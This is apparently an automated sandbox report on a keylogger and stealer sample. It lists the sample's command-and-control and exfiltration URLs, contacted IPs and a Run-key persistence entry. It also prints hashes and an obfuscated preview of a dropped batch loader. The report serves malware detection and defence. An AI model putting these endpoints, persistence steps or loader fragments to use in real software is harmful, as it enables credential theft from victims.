https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	jphwmyiA.pif, 00000003.00000003.3165124504.00000000266DF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000265B4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026589000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4139743451.0000000026427000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000265FE000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.00000000267FC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B359000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4141083059.000000002B1F7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B5CC000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B3CE000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B384000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B4AF000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C78E000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C719000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C744000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4137744136.000000001C5B7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C86F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C98E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	jphwmyiA.pif, 00000003.00000002.4136903739.0000000025421000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A1F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B5B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	jphwmyiA.pif, 00000003.00000003.3165124504.00000000267A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.3165124504.0000000026772000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B543000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.3400023440.000000002B575000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C903000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.3477581011.000000001C937000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0C	yxU3AgeVTi.exe, 00000000.00000003.1681344147.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707069184.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1709048620.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1681660647.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.00000000205C0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1842885940.0000000021170000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.0000000020694000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000009.00000003.1879153226.000000000061A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://amazonenviro.com:80/245_Aiymwhpjxsg4	yxU3AgeVTi.exe, 00000000.00000002.1688225604.00000000007DA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	jphwmyiA.pif, 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://www.pmail.com0	yxU3AgeVTi.exe, 00000000.00000003.1681344147.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1685509662.0000000021428000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1708111218.00000000215F2000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1708692910.0000000021700000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1709048620.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707383794.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1685805076.000000007F3AA000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1681034392.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.00000000205C0000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif.0.dr	false		high
https://reallyfreegeoip.org/xml/	jphwmyiA.pif, 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025470000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4138636535.000000002A240000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B600000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.91.198.176	mail.techniqueqatar.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
166.62.27.188	amazonenviro.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584678
Start date and time:	2025-01-06 07:57:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	yxU3AgeVTi.exe renamed because original name is a hash value
Original Sample Name:	6047499517804f1ea76b508ca469de99.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/7@5/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 207 Number of non-executed functions: 83
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:57:55	API Interceptor	2x Sleep call for process: yxU3AgeVTi.exe modified
01:58:04	API Interceptor	5330070x Sleep call for process: jphwmyiA.pif modified
01:58:09	API Interceptor	4x Sleep call for process: Aiymwhpj.PIF modified
06:58:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Aiymwhpj C:\Users\Public\Aiymwhpj.url
06:58:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Aiymwhpj C:\Users\Public\Aiymwhpj.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.91.198.176	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	grace.exe	Get hash	malicious	AgentTesla	Browse
	RTGS-WB-ABS-240730-NEW.lnk	Get hash	malicious	AgentTesla	Browse
149.154.167.220	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com	Get hash	malicious	Unknown	Browse
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com	Get hash	malicious	Unknown	Browse
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com	Get hash	malicious	Unknown	Browse
	https://telegra.ph/Clarkson-122025-01-02	Get hash	malicious	Unknown	Browse
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	FACT0987789000900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
188.114.97.3	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/8rr3/
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	FACT0987789000900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
amazonenviro.com	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
amazonenviro.com	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	166.62.27.188
mail.techniqueqatar.com	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
mail.techniqueqatar.com	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.com	Get hash	malicious	Unknown	Browse	149.154.167.220
	ZT0KQ1PC.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99
	RisingStrip.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://telegra.ph/Clarkson-122025-01-02	Get hash	malicious	Unknown	Browse	149.154.167.220
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
PUBLIC-DOMAIN-REGISTRYUS	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	http://www.technoafriwave.rw	Get hash	malicious	Unknown	Browse	207.174.214.183
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.115
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	YinLHGpoX4.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	103.53.42.63
	v4BET4inNV.vbs	Get hash	malicious	GuLoader	Browse	103.53.42.63
	InvoiceNr274728.pdf.lnk	Get hash	malicious	LummaC	Browse	208.91.198.106
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	119.18.54.39
	List of required items and services pdf.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	103.53.42.63
	s0zqlmETpm.lnk	Get hash	malicious	Unknown	Browse	216.10.240.70

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	adguardInstaller.exe	Get hash	malicious	PureLog Stealer	Browse	188.114.97.3
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	FACT0987789000900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Ref#66001032.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ny9LDJr6pA.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	jaTDEkWCbs.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	3LcZO15oTC.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	3LcZO15oTC.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	elyho3x5zz.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\Aiymwhpj.PIF	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
C:\Users\Public\Libraries\jphwmyiA.pif	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	HSBC_PAY.SCR.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse

Created / dropped Files

C:\Users\Public\Aiymwhpj.url

Download File

Process:	C:\Users\user\Desktop\yxU3AgeVTi.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Aiymwhpj.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	5.224478603849098
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XM667ysbxFXAIAV:HRYFVmTWDyzv6OExhQV
MD5:	FE048A3254DB1BB43B9A199C53F77E53
SHA1:	E0EF974871137D047ABF24F23D8829F4005D736A
SHA-256:	7CC811AB425AFDE355E7CF8AA3F13650D496CB767B0AC1FF184822745CBA5D91
SHA-512:	063701D0C306C410E67BEF7B6B6180D55A68EAEAA3A52761093B457EB79C2AB721F4CC5F1658A3874EE0515ED19E2B5C77EA08FD42FBA82B6C934D28861FB06A
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Aiymwhpj.PIF"..IconIndex=919407..HotKey=30..

C:\Users\Public\AiymwhpjF.cmd

Download File

Process:	C:\Users\user\Desktop\yxU3AgeVTi.exe
File Type:	DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15789
Entropy (8bit):	4.658965888116939
Encrypted:	false
SSDEEP:	384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
MD5:	CCE3C4AEE8C122DD8C44E64BD7884D83
SHA1:	C555C812A9145E2CBC66C7C64BA754B0C7528D6D
SHA-256:	4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
SHA-512:	EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
Malicious:	false
Preview:	.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

C:\Users\Public\Libraries\Aiymwhpj

Download File

Process:	C:\Users\user\Desktop\yxU3AgeVTi.exe
File Type:	data
Category:	dropped
Size (bytes):	587483
Entropy (8bit):	7.97941698770942
Encrypted:	false
SSDEEP:	12288:+cZzMs7baCyZxlymn17OtgtNXR1Fye2D69AEhIKb4u/k:+cpBbR+lyG17mgtNPae9XIA/k
MD5:	CBCC38C75EFFD12EDFBFE3A42776952D
SHA1:	15888D1A926BE2E5169CCF5B2C6C44149EA478A7
SHA-256:	43B4EDAED35A38B6304187C67BE1BEDA3F18769CDB06902BCFFB7BE597AC72A5
SHA-512:	7A45405A506D59FF89056388809C7EF11F09A2C04661DEE3C6E8C0F82E7C1E230F77B98D4CCC9F3996173ED848C38FC8379337313D4A13CCD1E76CAE4D2696C7
Malicious:	true
Preview:	.By.1.f.>...vB..X.'n...N.......B......-.$$....0....A.&&....-%.W..Ca..N..7b..R. +N..]..3X..X..HC.xF..T+.p4\|.R7.hAm.M.5.T{..J.Q.Y..g.X6...`.....Ol+..t.S.;...>^}0.m.0O.z9.yt.:..Q....K._...T.\|@...5......A......T!..x.uN......$$\..h..+^.....Bc.V.....H......}.N.q...9f.l...>RB....(".....]...d./ !o.[.....X..$$...!.....y-o9%.._^..f..Ih.W.A..S4..0...V..&$..V8..M..[76..N.O.\.e.#.t.V.D..gG.J...b0.e...g.0.r.@.N....W. .nx!Q.b....Z.^....3jiN..je#......:......L7..!...T+x@i..:'.H../&$.[.~.Y....h.[.. .x.....>&$%....+...,.R....K....Gz...........'..E\....W.Z....c.f..".'U7..1..SF...5J.\|1..1M.r4.9.A.}Y.%.J.`....o.2k.Ecr.=u.=Uu....mm.5.-.q..=.$$~....GhAh..j-.....g..d....d.........+..... .....7.).j..It4..%G...w..d.l.i.R.S..p/.+.8.jz.>.E...P.[.{..]).%b:.x3x,....-.:&$..Kz.C/.r.}&$)=.\|U..Ca..g.$&.j..C..Q+.ey..KL..)pI....%.+....B..=..m.\C.i5....u.... k...O..l..8......,.....C.....}6......-Y.5....=...p..H.."@...N..s.>....1%..lm.......G.e....].(h.\|.9x-%;..]pN.

C:\Users\Public\Libraries\Aiymwhpj.PIF

Download File

